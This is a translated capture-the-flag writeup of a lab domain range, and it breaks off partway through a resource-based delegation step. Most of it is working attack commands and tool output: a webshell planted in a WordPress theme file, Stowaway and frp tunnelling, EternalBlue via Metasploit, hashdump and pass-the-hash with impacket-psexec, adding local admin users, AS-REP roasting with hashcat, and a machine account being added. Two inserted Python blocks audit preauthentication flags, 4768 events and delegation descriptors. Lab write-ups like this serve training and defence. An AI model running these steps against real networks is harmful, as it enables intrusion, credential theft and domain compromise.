
Target introduction:
This range is a replay of the internal-network range from the finals of the 2022 (third) Wangding Cup. Completing the challenge helps players understand the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal network penetration, deepens understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The range has 4 flags in total, spread across different machines.
first-flag
We start with a single IP. Run fscan against it directly; results below
39.101.134.157
(icmp) Target 39.101.134.157 is alive
[*] Icmp alive hosts len is: 1
39.101.134.157:22 open
39.101.134.157:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://39.101.134.157 code:200 len:40014 title:XIAORANG.LAB
It is a WordPress site; the wp-admin backend has a weak password
admin/123456
Download a plugin that allows editing code
File Manager
It says upload is not allowed, maximum file size exceeded, so edit the code directly instead
/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone
Edit the code of 404.php and add a one-line webshell
Then access it directly
http://39.101.134.157//wp-content/themes/twentytwentyone/404.php
This gives flag1
________ ___ ________ ________ ________ _____
|\ _____\\ \ |\ __ \|\ ____\|\ __ \ / __ \
\ \ \__/\ \ \ \ \ \|\ \ \ \___|\ \ \|\ \|\/_|\ \
\ \ __\\ \ \ \ \ __ \ \ \ __\ \ \\\ \|/ \ \ \
\ \ \_| \ \ \____\ \ \ \ \ \ \|\ \ \ \\\ \ \ \ \
\ \__\ \ \_______\ \__\ \__\ \_______\ \_______\ \ \__\
\|__| \|_______|\|__|\|__|\|_______|\|_______| \|__|
flag01: flag{7c3d1e5e-ce27-4e00-9cb2-d578c1edc4dd}
second-flag
Check the network interfaces
(www-data:/var/www/html/wp-content/themes/twentytwentyone) $ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.15.26 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe25:4b7f prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:25:4b:7f txqueuelen 1000 (Ethernet)
RX packets 68201 bytes 88017337 (88.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24081 bytes 6447785 (6.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 850 bytes 75568 (75.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 850 bytes 75568 (75.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Upload fscan and scan the subnet
(www-data:/tmp) $ ./fscan -h 172.22.15.26/24
Results as follows
172.22.15.26:22 open
172.22.15.35:445 open
172.22.15.24:445 open
172.22.15.13:445 open
172.22.15.18:445 open
172.22.15.13:88 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.24:3306 open
172.22.15.18:139 open
172.22.15.35:135 open
172.22.15.13:139 open
172.22.15.18:135 open
172.22.15.13:135 open
172.22.15.24:80 open
172.22.15.18:80 open
172.22.15.26:80 open
172.22.15.24:135 open
[*] NetInfo:
[*]172.22.15.24
[->]XR-WIN08
[->]172.22.15.24
[*] NetInfo:
[*]172.22.15.18
[->]XR-CA
[->]172.22.15.18
[*] NetInfo:
[*]172.22.15.35
[->]XR-0687
[->]172.22.15.35
[*] NetBios: 172.22.15.35 XIAORANG\XR-0687
[+] 172.22.15.24 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios: 172.22.15.13 [+]DC XR-DC01.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetInfo:
[*]172.22.15.13
[->]XR-DC01
[->]172.22.15.13
[*] 172.22.15.13 (Windows Server 2016 Standard 14393)
[*] NetBios: 172.22.15.18 XR-CA.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle: http://172.22.15.26 code:200 len:39962 title:XIAORANG.LAB
[*] WebTitle: http://172.22.15.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.15.24 code:302 len:0 title:None 跳转url: http://172.22.15.24/www
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
[*] WebTitle: http://172.22.15.24/www/sys/index.php code:200 len:135 title:None
To summarise
172.22.15.26 entry point
172.22.15.24 MS17-010 && the web service is a management platform (ZDOO collaborative management platform)
172.22.15.35 XR-0687, domain member
172.22.15.18 XR-CA
172.22.15.13 DC
One at a time. First there is an EternalBlue (MS17-010) target we can try, so set up a proxy first to enable post-exploitation inside the internal network
Let's use Stowaway; this tool seems to be well regarded.
First upload linux_x64_agent to the target, then upload linux_x64_admin to the local machine or a VPS and run the following commands to start the programs
./linux_x64_admin -l 8856
./linux_x64_agent -c VPS:8856
The session is received, as follows
[*] Starting admin node on port 8856
.-') .-') _ ('\ .-') /' ('-. ('\ .-') /' ('-.
( OO ). ( OO) ) '.( OO ),' ( OO ).-. '.( OO ),' ( OO ).-.
(_)---\_)/ '._ .-'),-----. ,--./ .--. / . --. /,--./ .--. / . --. / ,--. ,--.
/ _ | |'--...__)( OO' .-. '| | | | \-. \ | | | | \-. \ \ '.' /
\ :' '. '--. .--'/ | | | || | | |,.-'-' | || | | |,.-'-' | | .-') /
'..'''.) | | \_) | |\| || |.'.| |_)\| |_.' || |.'.| |_)\| |_.' |(OO \ /
.-._) \ | | \ | | | || | | .-. || | | .-. | | / /\_
\ / | | '' '-' '| ,'. | | | | || ,'. | | | | | '-./ /.__)
'-----' '--' '-----' '--' '--' '--' '--''--' '--' '--' '--' '--'
{ v2.2 Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 39.101.134.157:35632 is set up successfully! Node id is 0
(admin) >>
Then select that node and start a socks5 proxy
(admin) >> use 0
(node 0) >> socks 8855
[*] Trying to listen on 0.0.0.0:8855......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >>
Then exploit EternalBlue through the proxy; msf is enough
msf6 > search ms17-010
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.22.15.24
EternalBlue failed many times here. The default payload is a reverse connection, but the target most likely has no outbound access, so it has to be changed to bind_tcp
I make this mistake a lot, sigh
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.22.15.24 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
sing-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Ser
ver 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R
2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.72.149 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
Change it with set
set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
payload => windows/x64/meterpreter/bind_tcp
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.22.15.24 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
sing-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Ser
ver 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R
2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 172.22.15.24 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Target
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit
But here, probably because of the proxy tool, it kept showing
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
[proxychains] Strict chain ... 81.70.241.211:8855 ... 172.22.15.24:4444 <--socket error or timeout!
So switch to frp and try again; frp remains the most reliable choice
server
root@VM-16-8-ubuntu:/home/ubuntu/frp_0.51.3_linux_386# ./frps -c frps.ini
2024/07/18 22:33:15 [I] [root.go:204] frps uses config file: frps.ini
2024/07/18 22:33:16 [I] [service.go:206] frps tcp listen on 0.0.0.0:7000
2024/07/18 22:33:16 [I] [root.go:213] frps started successfully
2024/07/18 22:33:18 [I] [service.go:539] [303f5d947098e807] client login info: ip [39.101.134.157:46614] version [0.51.3] hostname [] os [linux] arch [386]
2024/07/18 22:33:18 [I] [tcp.go:81] [303f5d947098e807] [frp] tcp proxy listen port [7001]
2024/07/18 22:33:18 [I] [control.go:497] [303f5d947098e807] new proxy [frp] type [tcp] success
client
(www-data:/tmp) $ chmod +x frpc
(www-data:/tmp) $ ./frpc -c frpc.ini
OK, update the proxychains config and run the same commands again
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit
Still the same error
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:4444 <--socket error or timeout!
The proxy also needs to be set once more inside msf
setg proxies socks5:81.70.241.211:7001
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit
Hmm, odd; resetting the target machine made it work
[+] 172.22.15.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.15.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.15.24:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.72.149:43082 -> 81.70.241.211:7001) at 2024-07-18 10:48:39 -0400
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
meterpreter >
172.22.15.24 also runs a web service, a management platform (ZDOO collaborative management platform), which is another PHP site
admin/123456
The weak password logs in to the backend, but there is no real functionality there. This site and the EternalBlue target are the same host, so once EternalBlue gives us the machine there is no need to look at this web service further.

Continuing with the EternalBlue post-exploitation mentioned above
Worth noting: when running commands through msf, Windows paths need double backslashes (\\)
dir C:\\users\\administrator\\
The flag is found under the administrator profile

meterpreter > dir C:\\users\\administrator\\flag
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Listing: C:\users\administrator\flag
====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 296 fil 2024-07-18 10:46:08 -0400 flag02.txt
This gives flag2
meterpreter > cat C:\\users\\administrator\\flag\\flag02.txt
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
__ _ ___ __
/ _| | / _ \/_ |
| |_| | __ _ __ _| | | || |
| _| |/ _` |/ _` | | | || |
| | | | (_| | (_| | |_| || |
|_| |_|\__,_|\__, |\___/ |_|
__/ |
|___/
flag02: flag{1ac1a760-ac0c-45b9-98d0-10f644b4b5c3}
You can also use msf's download command directly to save it to a directory of your choice
download c:/users/administrator/flag/flag02.txt /root
third-flag
You can see I am using the msf session directly here rather than opening a shell on the target, because the earlier proxy problem came up again and I could not be bothered to fix it
meterpreter > shell
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 81.70.241.211:7001 ... 127.0.0.1:43315 <--socket error or timeout!

The natural next step here is to create a new user and add it to the administrators group, to make remote desktop connection convenient
C:\Users\Administrator\flag>net user test test123! /add
C:\Users\Administrator\flag>net localgroup administrators test /add
Of course I used the native msf session hashdump instead
meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Connect directly through the proxy, authenticating with the NT hash instead of the password (pass-the-hash)
proxychains impacket-psexec administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
As follows, the connection is established successfully
┌──(root㉿kali)-[/home/kali/桌面]
└─# proxychains impacket-psexec administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:445 ... OK
[*] Requesting shares on 172.22.15.24.....
[*] Found writable share ADMIN$
[*] Uploading file ApswFsGS.exe
[*] Opening SVCManager on 172.22.15.24.....
[*] Creating service PsZP on 172.22.15.24.....
[*] Starting service PsZP.....
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:445 ... OK
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 81.70.241.211:7001 ... 172.22.15.24:445 ... OK
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32> whoami
nt authority\system
Now use the earlier command again to create a new user
C:\Windows\system32> net user test test123! /add
密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历史的要求。
请键入 NET HELPMSG 2245 以获得更多的帮助。
net user test Abcd1234 /add
net localgroup administrators test /add
Probe the ports to see whether 3389 is open; of course this step really belongs in the initial information gathering
Nmap scan report for 172.22.15.24
Host is up (0.085s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
Connecting directly with the Windows client shows an authentication error: "the function requested is not supported"

The solution is as follows
win+R -> gpedit.msc
Expand in turn "Computer Configuration" -> "Administrative Templates" -> "System" -> "Credentials Delegation"; the setting is named "Encryption Oracle Remediation"
Double-click "Encryption Oracle Remediation", set the state to "Enabled", set the protection level to "Vulnerable", then Apply -> OK
After that the remote desktop connection works normally

Opening phpstudy on the desktop shows the database connection configuration

root root@#123
zdoo zdoo123
A phpmyadmin database manager is also running
http://172.22.15.24/phpmyadmin/
Log in with the gathered information; root logs in successfully
Looking through the tables there is a user table, i.e. the account data of the web management platform on this same EternalBlue host. Export these account credentials, since they may also be domain users.
zdoosys_user


Use the exported information to build a username dictionary and a hash dictionary for brute forcing
Run AS-REP Roasting
Check whether there are accounts that do not require Kerberos pre-authentication
Use the AS-REP Roasting attack to try to obtain AS-REP responses encrypted with the domain users' password-derived keys
proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 xiaorang.lab/ -usersfile user.txt
or
proxychains4 impacket-GetNPUsers xiaorang.lab/ -dc-ip 172.22.15.13 -usersfile user.txt -request -outputfile hash.txt
Results:
$krb5asrep$23$huachunmei@XIAORANG.LAB:851c32a00bb708915b394cc3db3c5afc$455aba1dcf716647de66ef0468d2cf1fecf3f5e473f582c70bbd9132e90a09d50944673838be2bff83b6615a29172688610cc7135428f1fa9faa32fdd18cc5444d5ea11790317652245ecdd456578be96ad51fef567be36afe4c811afef8bdac90b5c4c2c68e4954a7cda4321ed9bd4ced55662232e3fd44dc3015d969620c6df152667823bd496e2a6266836fc66a1ec2678be429f29a5efe843bdae71f474a5d8dbad7e2ad13ea19fc34eb96394d7cd07d19358b2b2901c1b8a743197678a8c633ee433af967ce7e567c369ee952f319b83693eb7c900db81f0aecf2b1106011a8b268fc8d513d319d39c5
$krb5asrep$23$lixiuying@XIAORANG.LAB:17e675219219b3a515d2847cb31cf827$d2ca78257f5b4aac952735f4440b7cd23ec49e7d962958ceec07ceb1ae4d4791889d218dddb70466b49d2e4ee436d7646aae7392c89b7099a75067dbcf73cd338bf2923d11bba6945822a39028fb57d6d9e9343e497c9600c7c62369eb6fea54610a23d01ac758b8a3f26a1a95f9a91e18728e380bdb334ba5362f659ab679aba466d6ddbc5c39d51dfeef4a97149819de38238d9c1dc3e525a838a7b1a8ed20e0e2df5406d238cd96968bdb7a7744482e16b83e5075a2040254cdf7ce179cb486700c4efad9b4bfe9668b5f876d28dd66e7a4185d5e59de5173d1717d0b514ab9509c91421002c238d65d9e
XR-0687: AS-REP Roasting
AS-REP Roasting attack:
AS-REP Roasting is an attack that brute-forces user account passwords offline. Its applicability is fairly limited, because it requires the user account to have "Do not require Kerberos preauthentication" set, and that attribute is not enabled by default.
Pre-authentication is the first step of Kerberos authentication (AS_REQ & AS_REP); its main purpose is to prevent offline password brute-forcing. By default pre-authentication is enabled, and the KDC records password failure counts to prevent online brute-forcing. On AS_REQ & AS_REP, see: Kerberos protocol explained for domain authentication.
When pre-authentication is disabled, an attacker can request a ticket for the specified user, and the domain controller returns the TGT together with the Session Key encrypted with that user's hash without any verification. The attacker can therefore crack the Session Key encrypted with the user's hash offline, and if cracking succeeds, obtains that user's plaintext password.
AS-REP Roasting attack conditions
A domain user has "Do not require Kerberos preauthentication" set
A host/user that can communicate with the KDC is available
Carrying out the attack
Crack with hashcat
Type wordlists in the terminal
Then /usr/share/wordlists/ will contain rockyou.txt
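As an added example (not part of the original writeup): the conditions above correspond to one userAccountControl bit, one hash format and one Security event. This Python checks account attributes for that bit, splits a GetNPUsers / hashcat 18200 line into its fields, and flags 4768 events that carry the AS-REP Roasting fingerprint. The account values, the hash line and the event records are constructed samples, and the function names are my own.

```python
import re

# userAccountControl bits (names as in the Windows SDK / MS-ADTS)
UF_NORMAL_ACCOUNT = 0x200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000   # 4096, the value Certipy printed for the new machine account
UF_DONT_REQUIRE_PREAUTH = 0x400000      # "Do not require Kerberos preauthentication"

def accounts_without_preauth(accounts):
    """accounts maps sAMAccountName -> userAccountControl as read from LDAP.
    Returns the names whose AS-REP a KDC will hand out without pre-authentication."""
    return sorted(n for n, uac in accounts.items() if uac & UF_DONT_REQUIRE_PREAUTH)

# Constructed sample attribute values (hypothetical, not pulled from the range)
SAMPLE_ACCOUNTS = {
    "Administrator": UF_NORMAL_ACCOUNT,
    "lixiuying": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH,
    "huachunmei": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH,
    "hacker2$": UF_WORKSTATION_TRUST_ACCOUNT,
}

# GetNPUsers / hashcat -m 18200 line: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$")

def parse_asrep_hash(line):
    """Split the hash into its fields. etype 23 is RC4-HMAC: the 16-byte checksum is
    the HMAC-MD5 over the enc-part and edata is that enc-part encrypted under a key
    derived from the user's NT hash, so a password guess can be verified fully offline."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["etype"] = int(d["etype"])
    d["edata_len"] = len(d["edata"]) // 2
    return d

# Constructed hash line (checksum and edata are placeholders, not real ciphertext)
SAMPLE_HASH = "$krb5asrep$23$huachunmei@XIAORANG.LAB:" + "0a" * 16 + "$" + "ff" * 48

# Constructed Security event 4768 (Kerberos TGT requested) records, flattened to key=value
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=lixiuying TargetDomainName=XIAORANG.LAB IpAddress=::ffff:172.22.15.26 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=Administrator TargetDomainName=XIAORANG.LAB IpAddress=::ffff:172.22.15.35 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=huachunmei TargetDomainName=XIAORANG.LAB IpAddress=::ffff:172.22.15.26 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4769 TargetUserName=lixiuying TargetDomainName=XIAORANG.LAB IpAddress=::ffff:172.22.15.26 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
]

def parse_event(line):
    return dict(re.findall(r"(\w+)=(\S+)", line))

def asrep_roasting_hits(lines):
    """A successful 4768 with PreAuthType 0 (no pre-authentication) and RC4 (0x17) is the
    fingerprint of a roastable reply; normal logons show PreAuthType 2 and AES (0x12)."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") == "0" and ev.get("TicketEncryptionType", "").lower() == "0x17":
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits
```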
hashcat -a 0 -m 18200 --force '$krb5asrep$23$huachunmei@XIAORANG.LAB:eff58abecde01228d594ff0755236c78$59c759e6970e614d393f4e812922a996c2fc1c16b08607b569f2a1fda496dca9e575a67b343a70128c03b9ad6708c6fe92a38f32a113af67408f2550295df3adf190e62de5a733d105ca8a48aaa705a1c6df633005fdec2559d7c718c22b6ff94a656a4b09e7ed60db6becd4e073ab6d9236690f7dedf6641f3c6b18323f014992fe2f3aed745fa2951d9f08dd79bd88467eac5c6c1e1ba41228b302969c70f3dce14a4e4909ed492632d14e3b822089f5e79a345dbd9e12ec7580e8ada954b0cb8fbf9dd80af7f423db697d1a7a0013dd5f3d3403be2e17d5029461a7e10c55d223513928323bf80b948e95' rockyou.txt
Result:
lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx
172.22.15.35 is affected by a vulnerability called the Active Directory Domain Services privilege escalation vulnerability
CVE-2022-26923
Try which of the accounts can log in over 3389
┌──(root㉿kali)-[~]
└─# proxychains -q crackmapexec smb 172.22.15.0/24 -u 'lixiuying' -p 'winniethepooh'
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing WINRM protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SSH protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 172.22.15.18 445 XR-CA [*] Windows Server 2016 Standard 14393 x64 (name:XR-CA) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB 172.22.15.35 445 XR-0687 [*] Windows 10.0 Build 20348 x64 (name:XR-0687) (domain:xiaorang.lab) (signing:False) (SMBv1:False)
SMB 172.22.15.24 445 XR-WIN08 [*] Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (name:XR-WIN08) (domain:XR-WIN08) (signing:False) (SMBv1:True)
SMB 172.22.15.13 445 XR-DC01 [*] Windows Server 2016 Standard 14393 x64 (name:XR-DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
SMB 172.22.15.18 445 XR-CA [+] xiaorang.lab\lixiuying:winniethepooh
SMB 172.22.15.35 445 XR-0687 [+] xiaorang.lab\lixiuying:winniethepooh
SMB 172.22.15.24 445 XR-WIN08 [-] XR-WIN08\lixiuying:winniethepooh STATUS_LOGON_FAILURE
SMB 172.22.15.13 445 XR-DC01 [+] xiaorang.lab\lixiuying:winniethepooh
Remote login to 172.22.15.35: the second account logs in to the domain environment successfully

The difference between RBCD and traditional constrained delegation is that the constraint is configured on the resource server. In traditional constrained delegation the resource server can only passively accept delegation; whether delegation to the resource server is possible is controlled on the delegating server.
With RBCD, the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the resource controls which delegating servers may impersonate arbitrary users to access it.
Method 1
Edit hosts on the local kali
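As an added illustration (not from the writeup or from impacket): the attribute named above holds a binary, self-relative security descriptor. This Python builds a sample descriptor containing the hacker1$ SID that the writeup's tooling prints later, and decodes it the way an auditor reading msDS-AllowedToActOnBehalfOfOtherIdentity from LDAP would to see who may delegate to a computer. Function names and the approved list are my own.

```python
import struct

def sid_to_bytes(sid):
    """Encode 'S-1-5-21-...' into the binary SID layout used inside an ACE."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %s" % sid)
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(buf, off):
    """Decode a binary SID at buf[off]; returns (sid_string, length_in_bytes)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count

def build_rbcd_descriptor(sids):
    """Test fixture: a self-relative SECURITY_DESCRIPTOR of the kind stored in
    msDS-AllowedToActOnBehalfOfOtherIdentity, one ACCESS_ALLOWED_ACE per SID.
    Layout: 20-byte header, then the DACL, then the owner SID (BUILTIN\\Administrators)."""
    aces = b""
    for sid in sids:
        s = sid_to_bytes(sid)
        # AceType 0x00 = ACCESS_ALLOWED, AceFlags 0, AceSize, Mask = FULL_CONTROL (0xF01FF)
        aces += struct.pack("<BBHI", 0x00, 0x00, 8 + len(s), 0xF01FF) + s
    # ACL header: AclRevision 4 (ACL_REVISION_DS), Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    owner = sid_to_bytes("S-1-5-32-544")
    off_dacl, off_owner = 20, 20 + len(dacl)
    control = 0x8000 | 0x0004                    # SE_SELF_RELATIVE | SE_DACL_PRESENT
    header = struct.pack("<BBHIIII", 1, 0, control, off_owner, off_owner, 0, off_dacl)
    return header + dacl + owner

def allowed_to_act(sd):
    """Walk the DACL and return the SIDs named by ACCESS_ALLOWED_ACEs: the accounts that
    may use S4U2Proxy against this computer. An empty attribute (what impacket-rbcd
    reported before its write) means nobody can."""
    if not sd:
        return []
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == 0x00:
            sids.append(bytes_to_sid(sd, pos + 8)[0])
        pos += ace_size
    return sids

def unexpected_delegators(sd, approved):
    """Audit helper: SIDs in the attribute that are not on an approved list. A freshly
    created machine account (RID 1147 in this writeup) appearing here is the trace an
    RBCD abuse leaves on the victim computer object."""
    return [s for s in allowed_to_act(sd) if s not in approved]

# Constructed sample built around the SID impacket-rbcd printed for hacker1$ in the writeup
HACKER1_SID = "S-1-5-21-3745972894-1678056601-2622918667-1147"
SAMPLE_SD = build_rbcd_descriptor([HACKER1_SID])
```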
echo "172.22.15.35 XR-0687.xiaorang.lab" >> /etc/hosts
Add a machine account
proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker1$' -computer-pass 'Admin@123'
┌──(root㉿kali)-[~]
